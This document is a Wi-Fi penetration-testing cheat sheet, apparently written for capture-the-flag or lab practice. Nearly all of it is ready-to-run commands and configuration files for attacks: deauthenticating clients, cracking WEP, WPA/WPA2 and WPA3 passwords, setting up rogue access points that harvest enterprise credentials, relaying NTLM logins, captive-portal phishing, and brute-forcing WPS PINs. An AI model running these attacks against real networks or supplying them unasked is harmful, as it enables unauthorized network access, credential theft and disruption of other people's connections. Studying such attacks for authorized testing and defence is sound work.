Hacking Wi-Fi

Useful commands

Login and get the flag

curl -D - -s -d 'Username=admin&Password=admin&Submit=Login' -c $cookies -b $cookies -L http://<IP Address>/login.php | grep -iE 'flag{.+}'

Preparing The System

It is recommended to execute this command to kill some processes that may interfere with the different attack procedures:

sudo airmon-ng check kill

Monitor Mode

Start

Method 1

sudo ip link set <Wifi Device> down
sudo iwconfig <Wifi Device> mode monitor
sudo ip link set <Wifi Device> up

Method 2

sudo airmon-ng start <Wifi Device>

Stop

sudo airmon-ng stop <Wifi Monitor Device>
sudo ifconfig <Wifi Device> up

Enumeration

List APs & Its channels

sudo iw dev <Wifi Device> scan | egrep "DS Parameter set|SSID:"

Scan Networks

To write the captured packets to a file, append to the command -w <Filename> --output-format pcap.

Scan All Networks

sudo airodump-ng <Wifi Monitor Device> --band abg --wps

Scan Networks By Channel

sudo airodump-ng <Wifi Monitor Device> --band abg --wps -c <Network Channel>

Scan Network By ESSID (Name)

sudo airodump-ng <Wifi Monitor Device> --band abg --wps --essid <Network Name>

Scan Network By BSSID (MAC Address)

sudo airodump-ng <Wifi Monitor Device> --band abg --wps --bssid <Network MAC Address>

Discover Hidden ESSID (Name)

Without Connected Clients

It is mandatory to configure the channel with iwconfig before running mdk4.

sudo iwconfig <Wifi Monitor Device> channel <Wifi Channel>
sudo mdk4 <Wifi Monitor Device> p -t <Wifi MAC Address> -f <Wordlist>

With Connected Clients

sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Network MAC Address>
sudo aireplay-ng -0 6 -a <Network MAC Address> --ignore-negative <Wifi Monitor Device>

Discover Information About Hidden AP

  1. Create a HostAPD configuration file:
interface=<Wifi Device>
driver=nl80211
hw_mode=g
channel=1
ssid=<Wifi Name>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
  1. Connect to the AP: hostapd-mana <Filename>.conf
  2. Airodump-NG will receive the AP information

PcapFilter

  • Find POST data: pcapFilter.sh -P -f <Filename> | sort -u
  • Find Identities: pcapFilter.sh -I -f <Filename> | sort -u
  • Find Certificates: pcapFilter.sh -C -f <Filename> | sort -u

Connect To Network

Nmcli

Open Network

  1. Create the connection: sudo nmcli con add type wifi ifname <Wifi Device> con-name <Custom Alias> ssid <Network Name>
  2. If it is a hidden network: sudo nmcli con modify wifi-free wifi.hidden yes
  3. Connect: sudo nmcli con up <Custom Name>

WEP

  1. Create the connection: sudo nmcli con add type wifi ifname <Wifi Device> con-name <Custom Alias> ssid <Network Name>
  2. If it is a hidden network: sudo nmcli con modify <Custom Alias> wifi.hidden yes
  3. Set management off: sudo nmcli con modify <Custom Alias> 802-11-wireless-security.key-mgmt none
  4. Set password: sudo nmcli con modify <Custom Alias> 802-11-wireless-security.wep-key0 "0x<Password>"
  5. Set the encryption type: sudo nmcli con modify <Custom Alias> 802-11-wireless-security.wep-tx-keyidx 0
  6. Connect: sudo nmcli con up wifi-free

WPA/WPA2

  1. Create the connection: sudo nmcli con add type wifi ifname <Wifi Device> con-name <Custom Alias> ssid <Network Name>
  2. If it is a hidden network: sudo nmcli con modify <Custom Alias> wifi.hidden yes
  3. Set management on and encryption type: sudo nmcli con modify <Custom Alias> wifi-sec.key-mgmt wpa-psk
  4. Set password: sudo nmcli con modify <Custom Alias> wifi-sec.psk "<Password>"
  5. Connect: sudo nmcli con up <Custom Name>

NMCLi simpler

  • OPN
nmcli device wifi connect <SSID_NAME>
  • WEP
nmcli device wifi connect <SSID_NAME> password <PASSWORD>
  • WPA/2 PSK
nmcli device wifi connect <SSID_NAME> password <PASSWORD>
  • WPA3-SAE
nmcli device wifi connect <SSID_NAME> password <PASSWORD>
  • WPA/2 Enterprise (MGT)
nmcli device wifi connect <SSID_NAME> password <PASSWORD> identity <USERNAME> eap PEAP phase2-auth MSCHAPV2

WPA_Supplicant

Create The Configuration File

A configuration file with a custom name and .conf extension needs to be created.

OPEN

network={
    ssid="<Wifi Name>"
    key_mgmt=NONE
    scan_ssid=1
}

WEP

network={
  ssid="<Wifi Name>"
  key_mgmt=NONE
  wep_key0=<Password> <- (Hex Password Without ':')
  wep_tx_keyidx=0
}

WPA/2

network={
  ssid="<Wifi Name>"
  scan_ssid=1
  psk="<Password>"
  key_mgmt=WPA-PSK
}

WPA-MGT

network={
  ssid="<Wifi Name>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity="<[domain\]Username>"
  password="<PASSWORD>"
  eap=PEAP
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}

WPA3 SAE

network={
  ssid="<Wifi Name>"
  scan_ssid=1
  psk="<PASSWORD>"
  key_mgmt=SAE
  ieee80211w=2
}

Connect

Once the configuration file has been created, the following command must be executed to access the Wi-Fi network.

xterm -e sudo wpa_supplicant -i <Wifi Device> -c <Custom Name>.conf [-D nl80211] &

Next, run dhclient in a new terminal on the wifi interface previously used to obtain an IP.

sudo dhclient <Wifi Device> -v [-r]

Sniffing the Network Traffic

Capture and Analyse

  1. Identify a client’s MAC Address: sudo airodump-ng <Wifi Monitor Device> --band abg --wps -c <Wifi Channel>
  2. Stop Network-Manager: sudo systemctl stop network-manager
  3. Set down the Wifi device: sudo ip link set <Wifi Device> down
  4. Change the MAC Address: sudo macchanger -m <Client MAC Address> <Wifi Device>
  5. Set up the Wifi device: sudo ip link set <Wifi Device> up
  6. Start sniffing: sudo airodump-ng <Wifi Monitor Device> -c <Wifi Channel> -w <Filename> --output-format pcap
  7. Analyse PCAP file: sudo wireshark -r <Filename>-01.cap

Decrypt Captured Airodump Pcap and Analyse

You must have sniffed the handshake to be able to decrypt the traffic.

  1. Decrypt the Pcap: airdecap-ng -e <Wifi Name> -p <Wifi Password> <Filename>
  2. Analyse PCAP file: sudo wireshark -r <Filename>.cap

Exploitation

Fake Access Point

WPA/2 (PSK)

  1. Create a hostapd configuration file like so with custom name and .conf extension:
interface=<Wifi Device>
driver=nl80211
hw_mode=g
channel=<Spoofed Wifi Channel>
ssid=<Spoofed Wifi Name>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=<Password> # Ex: 12345678
  1. Create the fake AP as root: xterm -e hostapd-mana <Filename>.conf &
  2. Perform a deauthentication attack from the original network: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  3. Cracking the password when the handshake has been received:
    1. Method 1: hashcat -a 0 -m 2500 hostapd.hccapx <Wordlist> --force
    2. Method 2:
      1. hcxhash2cap --hccapx=hostapd.hccapx -c aux.pcap
      2. hcxpcapngtool aux.pcap -o hash.22000
      3. sudo hashcat -a 0 -m 22000 hash.22000 <Wordlist> --force

WEP password

  1. Find available networks: sudo airodump-ng <Wifi Monitor Device> --band abg --encrypt WEP
  2. Start capturing packets: xterm -e sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Wifi MAC Address> -c <Wifi Channel> -w <Filename> --output-format pcap &
  3. Generate traffic:
    1. With clients connected:
      1. Perform a fake authentication: xterm -e sudo aireplay-ng -1 3600 -q 10 -a <Wifi MAC Address> <Wifi Monitor Device> &
      2. Perform a replay attack (most effective): xterm -e sudo aireplay-ng -3 -b <Wifi MAC Address> -h <Source MAC Address> <Wifi Monitor Device> &
    2. Without clients connected:
      1. Set the device channel: sudo iwconfig <Wifi Device> channel <Wifi Channel>
      2. Perform a fake authentication: sudo aireplay-ng -1 0 -e <Wifi Name> -a <Wifi MAC Address> -h <Device MAC Address> <Wifi Monitor Device>
      3. Save the keystream file: sudo aireplay-ng -5 -b <Wifi MAC Address> -h <Device MAC Address> <Wifi Device>
      4. Create the request ARP packet: packetforge-ng -0 -a <Wifi MAC Address> -h <Device Monitor MAC Address> -w <Filename>.xor -k 255.255.255.255 -l 255.255.255.255
      5. Inject the request ARP packet: aireplay-ng -2 -r <Filename>.xor <Wifi Monitor Device>
  4. Crack the password: aircrack-ng -b <Wifi MAC Address> <Filename>

WPA/2 (PSK) password

Visible AP

  1. Find available networks: sudo airodump-ng <Wifi Monitor Device> --band abg
  2. Start capturing packets: xterm -e sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Wifi MAC Address> -c <Wifi Channel> -w <Filename> --output-format pcap &
  3. Perform a deauthentication attack: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  4. Crack the password: aircrack-ng <Filename> -b <Wifi MAC Address> -w <Wordlist>

Hidden AP

  1. Create a HostAPD configuration file:
interface=<Wifi Device>
driver=nl80211
hw_mode=g
channel=1
ssid=<Wifi Name>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
  1. Connect to the AP: hostapd-mana <Filename>.conf
  2. Stop HostAPD-Mana when the AP-STA-POSSIBLE-PSK-MISMATCH message has been received
  3. Crack the Handshake with Hashcat: hashcat -a 0 -m 2500 hostapd.hccapx <Wordlist> --force

WPA3 SAE

Brute Force

The https://github.com/blunderbuss-wctf/wacker tool can be used as root.

  1. Get the correct frequency (Like 2462): sudo iwlist <Wifi Device> frequency | grep -i 'Channel <Channel Number>' | awk '{print int($4 * 1000)}'
  2. Execute the attack: wacker.py --wordlist <Wordlist> --ssid <Wifi Name> --bssid <Wifi MAC Address> --interface <Wifi Device> --freq <Frequency>

With Fake Access Point

  1. Capture information in CSV format: sudo airodump-ng <Wifi Monitor Device> --band abg --wps -w <Filename> --output-format csv
  2. Check if the network supports WPA2 PSK: cat <Filename>.csv | grep 'PSK'
  3. Perform a Fake Access Point attack.
  4. Set the monitor device channel: sudo iwconfig <Wifi Monitor Device> channel <Wifi Channel>
  5. Perform a deauthentication attack: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  6. Crack hccapx file as mentioned in Fake Access Point attack

MGT (Enterprise)

Recognition

  1. Start capturing packets: sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Wifi MAC Address> -c <Wifi Channel> -w <Filename> --output-format pcap
  2. Set the monitor device channel: sudo iwconfig <Wifi Monitor Device> channel <Wifi Channel>
  3. Perform a deauthentication attack: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  4. Analyse PCAP file: sudo wireshark -r <Filename>.cap
    1. Get domain name and usernames:
      1. With Wireshark: sudo wireshark -r <Filename>.cap -Y 'eap.identity != ""'
      2. With Tshark: tshark -r <Filename>.cap -Y '(eap.identity)' -T fields -e eap.identity
    2. Get the email of the certificate server:
      1. With Tshark: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && x509sat.IA5String" -T fields -e x509sat.IA5String
    3. View entire SSL certificate information:
      1. With PcapFilter: bash pcapFilter.sh -f <Filename>.cap -C | grep "@" | sort -u
      2. With Wireshark: sudo wireshark -r <Filename>.cap -Y '**(**wlan.bssid **==** <Wifi MAC Address>**)** **&&** **(**tls.handshake.certificate**)'**
      3. With Tshark: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && ssl.handshake.type == 11" -V
    4. Get the supported EAP methods with https://github.com/blackarrowsec/EAP_buster (Get usernames) : ./EAP_buster.sh "<Wifi Name>" "<Wifi Username>" "<Wifi Device>"

Crack

With Brute Force

  1. Download the https://github.com/Wh1t3Rh1n0/air-hammer
  2. Create the user file: echo '[Domain\]Username' > <User File>
  3. Crack the password: ./air-hammer.py -i <Wifi Device> -e <Wifi Name> -p <Wordlist> -u <User File>

With EAPHammer

  1. Download the EapHammer
  2. Get entire SSL certificate information
  3. Generate the certificates: python3 ./eaphammer --cert-wizard
  4. Start the attack: python3 ./eaphammer -i <Wifi Device> --auth wpa-eap --essid <Wifi Name> --creds --negotiate balanced
  5. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>
  6. Crack the hash: hashcat -m 5500 -a 0 <Captured Hash> <Wordlist> --force

With Freeradius and Hostapd-Mana

  1. Install Freeradius: sudo apt install freeradius
  2. Get entire SSL certificate information
  3. View necessary information:
    1. Clean occurrences: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && ssl.handshake.type == 11" -V | grep -ow -E '(countryName=\w+)|(stateOrProvinceName=.+)|(localityName=.+)|(organizationName=.+)|(emailAddress=.+)|(commonName=.+)' | cut -d ',' -f 1 | sed 's/)//' | sort -u
    2. Complete occurrences: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && ssl.handshake.type == 11" -V | grep 'countryName\|stateOrProvinceName\|localityName\|organizationName\|emailAddress\|commonName'
  4. Modify the certificate_authority section of the /etc/freeradius/3.0/certs/ca.cnf file according to the captured certificate:
[certificate_authority]
countryName             = US
stateOrProvinceName     = CA
localityName            = San Francisco
organizationName        = Playtronics
emailAddress            = ca@playtronics.com
commonName              = "Playtronics Certificate Authority"
  1. Modify the server section of the /etc/freeradius/3.0/certs/server.cnf file according to the captured certificate:
[server]
countryName             = US
stateOrProvinceName     = CA
localityName            = San Francisco
organizationName        = Playtronics
emailAddress            = server@playtronics.com
commonName              = "Playtronics"
  1. Remove the Diffie-Hellman Parameters and create the new certificate.

It will show an error at the end due to the client configuration. No harm done.

rm /etc/freeradius/3.0/certs/dh
cd /etc/freeradius/3.0/certs/; make
  1. Create the Access Point user file: /etc/hostapd-mana/mana.eap_user
*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]
  1. Create the Access Point configuration file: /etc/hostapd-mana/mana.conf:
# SSID of the AP
ssid=<Spoofed Wifi Name>

# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=<Wifi Device>
driver=nl80211

# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)

channel=<Allowed Wifi Channel, 1 to 10 for example>

# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=g

# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1

# Key workaround for Win XP
eapol_key_index_workaround=0

# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user

# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh

# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP

# Enable Mana WPE
mana_wpe=1

# Store credentials in that file
mana_credout=/tmp/hostapd.credout

# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1

# EAP TLS MitM
mana_eaptls=1
  1. Deploy the fake Access Point and wait for a user to log in.
sudo hostapd-mana /etc/hostapd-mana/mana.conf
  1. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>
  2. Crack the password:
    1. With Asleap: Use the returned command by hostapd-mana → asleap -C 5f:...:5a -R 7a:...:dd -W <Wordlist>
    2. With Hashcat: hashcat -m 5500 -a 0 <Mana Captured Hash> <Wordlist> --force

Relay NTLM

  1. Set down the Wifi device: sudo ip link set <Wifi Device> down
  2. Set a fake MAC Address: sudo macchanger -m 00:CA:FE:BA:BE:00 <Wifi Device>
  3. Set up the Wifi device: sudo ip link set <Wifi Device> up
  4. Create the WPA_Sycophant configuration file:
network={
  ## The SSID to relay and authenticate against
  ssid="<Wifi Target Name>"
  ## -------------
  scan_ssid=1
  key_mgmt=WPA-EAP
  ## Do not modify
  identity=""
  anonymous_identity=""
  password=""
  eap=PEAP
  ## Chage to phase1="peapver=1" in case of failure
  phase1="crypto_binding=0 peaplabel=0"
  ## -------------
  phase2="auth=MSCHAPV2"
  bssid_blacklist=00:CA:FE:BA:BE:00
}
  1. Get the certificate information: bash pcapFilter.sh -f <Filename>.cap -C | grep "@" | grep Issuer | sort -u | cut -d ':' -f 2 | sed 's/,/\n/g'
  2. Start the RogueAP with Berate_ap: ./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log <Wifi Device> lo <Wifi Name>
  3. Set the monitor device channel: iwconfig <Wifi Monitor Device> channel <Channel>
  4. Start WPA_Sycophant: ./wpa_sycophant.sh -c <Filename>.conf -i <Wifi Device>
  5. Perform a deauthentication attack: sudo aireplay-ng -0 10 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] (Repeat if doesn't work)
  6. Request a DHCP IP: sudo dhclient <Wifi Device> -v

Attack To Clients

RogueAP With Captive Portal

  1. Stop DNSMasq: sudo killall dnsmasq
  2. Start the attack with EapHammer: python3 ./eaphammer --essid <Rogue Wifi Name> --interface <Wifi Device> --captive-portal
  3. Set the Wifi Monitor Device Channel: sudo iwconfig <Wifi Monitor Device> channel <Channel>
  4. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>

RogueAP With Responder

Responder must be installed

  1. Stop DNSMasq: sudo killall dnsmasq
  2. Start the attack with EapHammer: python3 ./eaphammer --essid <Rogue Wifi Name> --interface <Wifi Device> --hostile-portal
  3. Set the Wifi Monitor Device Channel: sudo iwconfig <Wifi Monitor Device> channel <Channel>
  4. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>

WPS

Reaver

Using Reaver you can perform a brute force attack on the WPS pin of the access point.

sudo reaver -i <Wifi Monitor Device> -b <Wifi MAC Address> -vvNwf [-K {1|2|3}] -c <Channel>
  • K: Run pixiedust attack
  • vv: Verbose
  • N: Do not send NACK messages when out-of-order packets are received
  • w: Mimic a W7 registrar
  • f: Disable channel hopping

Bully

Using Bully you can perform a brute force attack on the WPS pin of the access point.

sudo bully <Wifi Monitor Device> -b <Wifi MAC Address> -c <Channel> -S -F -B -v 3